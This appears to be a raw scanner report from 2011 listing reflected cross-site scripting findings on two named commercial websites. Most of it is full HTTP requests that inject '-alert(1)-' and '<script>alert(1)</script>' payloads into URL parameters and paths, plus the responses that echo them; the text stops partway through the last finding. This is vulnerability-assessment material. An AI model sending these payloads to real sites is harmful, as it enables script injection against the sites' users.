Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscriptions/?fuseaction=viewItem&cat=20199c9"-alert(1)-"ce6460bfe43&itemID=SCWEB09GBP01 HTTP/1.1 Host: www.haymarketbusinesssubs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Page not found Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/ Connection: close Date: Mon, 31 Jan 2011 19:48:13 GMT Server: Microsoft-IIS/6.0 X-HMIO-Server: HBIWeb1 X-Powered-By: ASP.NET Set-Cookie: CFID=970753;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/ Set-Cookie: CFTOKEN=55220764;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/ Set-Cookie: JSESSIONID=5630b9be91597d16c194;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d ...[SNIP]... VARIABLES hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S) hbx.pn="404";//PAGE NAME(S) hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20199C9"-ALERT(1)-"CE6460BFE43&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY hbx.pndef="index.cfm";//DEFAULT PAGE NAME hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
//OPTIONAL PAGE VARIABLES //ACTION SETT ...[SNIP]...
The value of the fuseaction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cab60"-alert(1)-"ced730ffdfc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscriptions/?fuseaction=viewItemcab60"-alert(1)-"ced730ffdfc&cat=20&itemID=SCWEB09GBP01 HTTP/1.1 Host: www.haymarketbusinesssubs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Page not found Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/ Connection: close Date: Mon, 31 Jan 2011 19:48:05 GMT Server: Microsoft-IIS/6.0 X-HMIO-Server: HBIWeb1 X-Powered-By: ASP.NET Set-Cookie: CFID=970737;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/ Set-Cookie: CFTOKEN=86237119;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/ Set-Cookie: JSESSIONID=5630932a02f217556153;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d ...[SNIP]... URATION VARIABLES hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S) hbx.pn="404";//PAGE NAME(S) hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEMCAB60"-ALERT(1)-"CED730FFDFC&CAT=20&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY hbx.pndef="index.cfm";//DEFAULT PAGE NAME hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
The value of the itemID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe00"-alert(1)-"a6076651e04 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscriptions/?fuseaction=viewItem&cat=20&itemID=SCWEB09GBP01bbe00"-alert(1)-"a6076651e04 HTTP/1.1 Host: www.haymarketbusinesssubs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Page not found Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/ Connection: close Date: Mon, 31 Jan 2011 19:48:21 GMT Server: Microsoft-IIS/6.0 X-HMIO-Server: HBIWeb1 X-Powered-By: ASP.NET Set-Cookie: CFID=970767;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/ Set-Cookie: CFTOKEN=41263314;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/ Set-Cookie: JSESSIONID=56306b4e7a5963266475;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d ...[SNIP]... t="DM5606269AEF84EN3";//ACCOUNT NUMBER(S) hbx.pn="404";//PAGE NAME(S) hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20&ITEMID=SCWEB09GBP01BBE00"-ALERT(1)-"A6076651E04?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY hbx.pndef="index.cfm";//DEFAULT PAGE NAME hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
1.135. http://www.haymarketbusinesssubs.com/subscriptions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.haymarketbusinesssubs.com
Path:
/subscriptions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1f9"-alert(1)-"eeb60f51ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscriptions/?ad1f9"-alert(1)-"eeb60f51ea4=1 HTTP/1.1 Host: www.haymarketbusinesssubs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Page not found Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/ Connection: close Date: Mon, 31 Jan 2011 19:47:59 GMT Server: Microsoft-IIS/6.0 X-HMIO-Server: HBIWeb1 X-Powered-By: ASP.NET Set-Cookie: CFID=970719;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/ Set-Cookie: CFTOKEN=14115562;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/ Set-Cookie: JSESSIONID=5630cf1f6100301d4d75;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d ...[SNIP]... SECTION //CONFIGURATION VARIABLES hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S) hbx.pn="404";//PAGE NAME(S) hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?AD1F9"-ALERT(1)-"EEB60F51EA4=1?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY hbx.pndef="index.cfm";//DEFAULT PAGE NAME hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78edb"><script>alert(1)</script>47e97b4e7e6 was submitted in the REST URL parameter 1. This input was echoed as 78edb\"><script>alert(1)</script>47e97b4e7e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico78edb"><script>alert(1)</script>47e97b4e7e6 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:20:55 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab61"><script>alert(1)</script>ffe87d33d24 was submitted in the REST URL parameter 1. This input was echoed as fab61\"><script>alert(1)</script>ffe87d33d24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /network-security-solutions-obstacles-in-it-transformationfab61"><script>alert(1)</script>ffe87d33d24/security_software HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 19:48:06 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 19:48:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47310
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb59"><script>alert(1)</script>9ce1fb0d6b9 was submitted in the REST URL parameter 1. This input was echoed as 4fb59\"><script>alert(1)</script>9ce1fb0d6b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin4fb59"><script>alert(1)</script>9ce1fb0d6b9/css/colors-fresh.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:15:25 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:15:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 108f1"><script>alert(1)</script>2542fce189a was submitted in the REST URL parameter 2. This input was echoed as 108f1\"><script>alert(1)</script>2542fce189a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin/css108f1"><script>alert(1)</script>2542fce189a/colors-fresh.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:15:46 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:15:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25734"><script>alert(1)</script>2b4c433f186 was submitted in the REST URL parameter 3. This input was echoed as 25734\"><script>alert(1)</script>2b4c433f186 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin/css/colors-fresh.css25734"><script>alert(1)</script>2b4c433f186 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:16:07 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:16:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976b6"><script>alert(1)</script>ef7c2ff4d9b was submitted in the REST URL parameter 1. This input was echoed as 976b6\"><script>alert(1)</script>ef7c2ff4d9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin976b6"><script>alert(1)</script>ef7c2ff4d9b/css/login.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:14:13 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:14:13 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a36"><script>alert(1)</script>3f9128e0065 was submitted in the REST URL parameter 2. This input was echoed as c2a36\"><script>alert(1)</script>3f9128e0065 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin/cssc2a36"><script>alert(1)</script>3f9128e0065/login.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:14:43 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:14:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16a7d"><script>alert(1)</script>e31de724c2f was submitted in the REST URL parameter 3. This input was echoed as 16a7d\"><script>alert(1)</script>e31de724c2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-admin/css/login.css16a7d"><script>alert(1)</script>e31de724c2f HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:15:04 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:15:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb603"><script>alert(1)</script>854924fe41d was submitted in the REST URL parameter 1. This input was echoed as fb603\"><script>alert(1)</script>854924fe41d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentfb603"><script>alert(1)</script>854924fe41d/plugins/sexybookmarks/css/comfeed.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c934"><script>alert(1)</script>212a21e8ebb was submitted in the REST URL parameter 2. This input was echoed as 9c934\"><script>alert(1)</script>212a21e8ebb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins9c934"><script>alert(1)</script>212a21e8ebb/sexybookmarks/css/comfeed.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:17:44 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79afa"><script>alert(1)</script>6f363fd4d80 was submitted in the REST URL parameter 3. This input was echoed as 79afa\"><script>alert(1)</script>6f363fd4d80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks79afa"><script>alert(1)</script>6f363fd4d80/css/comfeed.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:07 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887ac"><script>alert(1)</script>e3828ad6376 was submitted in the REST URL parameter 4. This input was echoed as 887ac\"><script>alert(1)</script>e3828ad6376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css887ac"><script>alert(1)</script>e3828ad6376/comfeed.css HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 20:18:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 WWW-Authenticate: Basic realm="Restricted Area" X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Cookie,User-Agent,Accept-Encoding Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 44559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a4e"><script>alert(1)</script>7f607892514 was submitted in the REST URL parameter 5. This input was echoed as 37a4e\"><script>alert(1)</script>7f607892514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sexybookmarks/css/comfeed.css37a4e"><script>alert(1)</script>7f607892514 HTTP/1.1 Host: www.installsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;
Response
